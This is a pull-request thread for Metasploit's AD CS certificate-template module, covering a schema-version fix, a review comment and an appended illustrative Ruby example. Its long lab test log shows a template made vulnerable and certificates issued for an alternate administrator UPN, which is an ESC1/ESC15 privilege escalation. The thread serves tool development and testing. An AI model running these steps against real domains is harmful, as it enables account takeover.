Fix UPDATE certificate templates with admin/ldap/ad_cs_cert_template
#19572
Conversation
It looks like when `msPKI-Template-Schema-Version` is included in an UPDATE operation, the template becomes unusable. When `msPKI-Template-Schema-Version` is included in a CREATE operation and the value is 1 or 2, the template is created with a schema version of 1. I did not test other schema version values.
I think what we might actually want to do is:

- revert the change that removed `msPKI-Template-Schema-Version` from the `IGNORED_ATTRIBUTES` array
- remove the schema version from all of the templates (since they're created as version 1 anyways)
- add the current version to the output of the READ operation (see the patch below)
Also if you don't mind, could you update the spots I missed to note the ESC15 support?
diff --git a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
index 0044830ecb..bfd67a8c8c 100644
--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -428,6 +428,11 @@ class MetasploitModule < Msf::Auxiliary
print_status(" msPKI-RA-Signature: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
end
+ pki_flag = obj['mkpki-template-schema-version']&.first
+ if pki_flag.present?
+ print_status(" msPKI-Template-Schema-Version: #{pki_flag}")
+ end
+
if obj['mspki-certificate-policy'].present?
if obj['mspki-certificate-policy'].length == 1
if (oid_name = get_pki_oid_displayname(obj['mspki-certificate-policy'].first)).present?
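Review bot: the lookup key on the first added line, `obj['mkpki-template-schema-version']`, is misspelled for the attribute the hunk means to print (msPKI-Template-Schema-Version), so the `present?` check never passes and the version is silently never shown; the context lines use the expected lowercased form, e.g. `obj['mspki-certificate-policy']`, so this should read `pki_flag = obj['mspki-template-schema-version']&.first`. A smaller style point in the same hunk: the value is a plain integer version rather than a flag word, so reusing `pki_flag` here is misleading; a name such as `schema_version` would make the block self-describing.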
Thanks @smcintyre-r7, I've made these changes in the latest commit.
Alright I ran through this using the templates to both create and update the existing template to be vulnerable to ESC15 to see that it's working.
Testing Output

```
metasploit-framework.pr (S:0 J:0) > show options
Global Options:
Option Current Setting Description
ConsoleLogging false Log all console input and output
LogLevel 3 Verbosity of logs (default 0, max 3)
MeterpreterPrompt meterpreter The meterpreter prompt string
MinimumRank 0 The minimum rank of exploits that will run without explicit confirmation
Prompt metasploit-framework.pr (S:%S J:%J) The prompt string
PromptChar > The prompt character
PromptTimeFormat %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
SessionTlvLogging false Log all incoming and outgoing TLV packets
TimestampOutput false Prefix all console output with a timestamp
metasploit-framework.pr (S:0 J:0) > fzuse
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > show options
Module options (auxiliary/admin/ldap/ad_cs_cert_template):
Name Current Setting Required Description
BASE_DN no LDAP base DN if you already have it
CERT_TEMPLATE PR-19572 yes The remote certificate template name
SSL false no Enable SSL on the LDAP connection
TEMPLATE_FILE /home/smcintyre/Repositories/metasploit-framework/data/auxiliary/admin/ldap/ad_cs_cert_template/esc1_template.yaml no Local template definition file
Used when connecting via an existing SESSION:
Name Current Setting Required Description
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
DOMAIN msflab.local no The domain to authenticate to
PASSWORD Password1! no The password to authenticate with
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 no The target port
USERNAME smcintyre no The username to authenticate with
Auxiliary action:
Name Description
READ Read the certificate template
View the full module info with the info, or info -d command.
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145221_default_192.168.159.10_windows.ad.cs.te_964934.json
[*] Certificate Template:
[*] distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] displayName: PR-19572
[*] objectGUID: f0f65d97-d4d4-4e3c-822f-09ca617945c5
[*] msPKI-Certificate-Name-Flag: 0x00000001
[*] * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[*] msPKI-Enrollment-Flag: 0x00000000
[*] msPKI-Private-Key-Flag: 0x00000010
[*] * CT_FLAG_EXPORTABLE_KEY
[*] msPKI-RA-Signature: 0x00000000
[*] pKIKeyUsage: 0x00000000
[*] pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > delete
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145226_default_192.168.159.10_windows.ad.cs.te_917580.json
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[-] Auxiliary aborted due to failure: not-found: The specified template was not found.
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > create
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[*] Creating: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145233_default_192.168.159.10_windows.ad.cs.te_420036.json
[*] Certificate Template:
[*] distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] displayName: PR-19572
[*] objectGUID: 11b06edf-201e-4ade-8130-759c0a4f0f27
[*] msPKI-Certificate-Name-Flag: 0x00000001
[*] * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[*] msPKI-Enrollment-Flag: 0x00000000
[*] msPKI-Private-Key-Flag: 0x00000010
[*] * CT_FLAG_EXPORTABLE_KEY
[*] msPKI-RA-Signature: 0x00000000
[*] msPKI-Template-Schema-Version: 1
[*] pKIKeyUsage: 0x00000000
[*] pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > use icpr_cert
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/admin/dcerpc/icpr_cert . normal No ICPR Certificate Management
1 \_ AKA: Certifry . . . .
2 \_ AKA: Certipy . . . .
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/dcerpc/icpr_cert
[*] Using auxiliary/admin/dcerpc/icpr_cert
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options
Module options (auxiliary/admin/dcerpc/icpr_cert):
Name Current Setting Required Description
ADD_CERT_APP_POLICY 1.3.6.1.5.2.3.4 no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN [email protected] no Alternative certificate UPN (format: USER@DOMAIN)
CA msflab-DC-CA yes The target certificate authority
CERT_TEMPLATE ESC15-Test yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Used when connecting via an existing SESSION:
Name Current Setting Required Description
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser mhatter no The username to authenticate as
Auxiliary action:
Name Description
REQUEST_CERT Request a certificate
View the full module info with the info, or info -d command.
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE PR-19572
CERT_TEMPLATE => PR-19572
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY
Unsetting ADD_CERT_APP_POLICY...
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options
Module options (auxiliary/admin/dcerpc/icpr_cert):
Name Current Setting Required Description
ADD_CERT_APP_POLICY no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN [email protected] no Alternative certificate UPN (format: USER@DOMAIN)
CA msflab-DC-CA yes The target certificate authority
CERT_TEMPLATE PR-19572 yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Used when connecting via an existing SESSION:
Name Current Setting Required Description
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser mhatter no The username to authenticate as
Auxiliary action:
Name Description
REQUEST_CERT Request a certificate
View the full module info with the info, or info -d command.
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10
[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022145314_default_192.168.159.10_windows.ad.cs_866614.pfx
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150133_default_192.168.159.10_windows.ad.cs.te_142919.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150134_default_192.168.159.10_windows.ad.cs.te_145328.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10
[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 - * 1.3.6.1.5.2.3.4
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022150140_default_192.168.159.10_windows.ad.cs_878467.pfx
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) >
```
This change introduced an issue with the `admin/ldap/ad_cs_cert_template` module when using the `UPDATE` action and the default templates. Removing the `msPKI-Template-Schema-Version` from the `IGNORED_ATTRIBUTES` array will result in deleting the attribute on the remote server. This is due to the fact that the default certificate templates used by the module don't include this attribute. To fix this, I just added the `msPKI-Template-Schema-Version` attribute to certificate templates and set it to version 2.

Verify
Please follow the steps in the Exploiting ESC4 To Gain Domain Administrator Privileges section of the docs.
The installation procedure for ESC4 is in the following PR.
Before the fix (using the default ESC1 template)
After the fix (using the default ESC1 template)
Note that I tested with the other default templates (ESC2 and ESC3) and they still work as expected.
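The attribute-deletion behaviour described in the PR text above, modelled as an added Ruby example. This is not the module's own code: the constant name `IGNORED_ATTRIBUTES` is borrowed from the description, while `build_modify_ops`, the ignore-list contents and the sample template objects are assumptions constructed for the illustration. It shows why an attribute that the local template files do not carry must either stay on the ignore list or be added to the templates, which is the fix this PR takes.

```ruby
# Added example, not the Metasploit module's code. Models an UPDATE that diffs
# a local template definition against the live LDAP object: every attribute the
# server has but the template does not mention becomes a delete, unless it is
# on the ignore list. Names and sample data are constructed for this example.

# Attributes the updater must never touch (constructed contents, modelled on
# the IGNORED_ATTRIBUTES array the PR description refers to).
IGNORED_ATTRIBUTES = %w[
  distinguishedname objectguid mspki-template-schema-version
].freeze

# Return a list of [op, attribute, values] modify operations that make `remote`
# match `template` for every attribute not in `ignored`.
#   remote   - Hash: lowercased attribute name => Array of string values
#   template - Hash: attribute name in any case => value or Array of values
def build_modify_ops(remote, template, ignored: IGNORED_ATTRIBUTES)
  desired = template.each_with_object({}) do |(name, value), acc|
    acc[name.downcase] = Array(value).map(&:to_s)
  end

  ops = []
  desired.each do |attr, values|
    next if ignored.include?(attr)
    current = remote[attr]
    if current.nil?
      ops << [:add, attr, values]
    elsif current.map(&:to_s).sort != values.sort
      ops << [:replace, attr, values]
    end
  end

  # Anything present on the server but absent from the template is deleted.
  # This is exactly why dropping an attribute from the ignore list, while the
  # templates still omit it, wipes that attribute from the remote object.
  (remote.keys - desired.keys).each do |attr|
    next if ignored.include?(attr)
    ops << [:delete, attr, nil]
  end
  ops
end

# Constructed sample: a live template object and a local definition that, like
# the default templates before this PR, omits the schema version.
REMOTE_OBJECT = {
  'mspki-certificate-name-flag'   => ['1'],
  'mspki-enrollment-flag'         => ['0'],
  'mspki-template-schema-version' => ['2'],
  'objectguid'                    => ['constructed-guid-for-example'],
}.freeze

LOCAL_TEMPLATE = {
  'msPKI-Certificate-Name-Flag' => 1,
  'msPKI-Enrollment-Flag'       => 0,
}.freeze

# Schema version on the ignore list: the diff leaves it alone.
def safe_ops
  build_modify_ops(REMOTE_OBJECT, LOCAL_TEMPLATE)
end

# Schema version removed from the ignore list with templates unchanged: the
# regression the PR text describes, the attribute is deleted on the server.
def regressed_ops
  build_modify_ops(REMOTE_OBJECT, LOCAL_TEMPLATE,
                   ignored: IGNORED_ATTRIBUTES - ['mspki-template-schema-version'])
end

# The PR's fix: carry the attribute in the template itself, so the diff keeps
# it even though it is no longer ignored.
def fixed_ops
  build_modify_ops(REMOTE_OBJECT,
                   LOCAL_TEMPLATE.merge('msPKI-Template-Schema-Version' => 2),
                   ignored: IGNORED_ATTRIBUTES - ['mspki-template-schema-version'])
end

if $PROGRAM_NAME == __FILE__
  puts "ignored:   #{safe_ops.inspect}"
  puts "regressed: #{regressed_ops.inspect}"
  puts "fixed:     #{fixed_ops.inspect}"
end
```

Running the file prints an empty operation list for the ignored and fixed cases and a single `:delete` of `mspki-template-schema-version` for the regressed case. The general point for anyone maintaining a sync-style updater is that an ignore list and the template contents have to agree: removing an entry from one without adding it to the other turns a read-only attribute into a deletion.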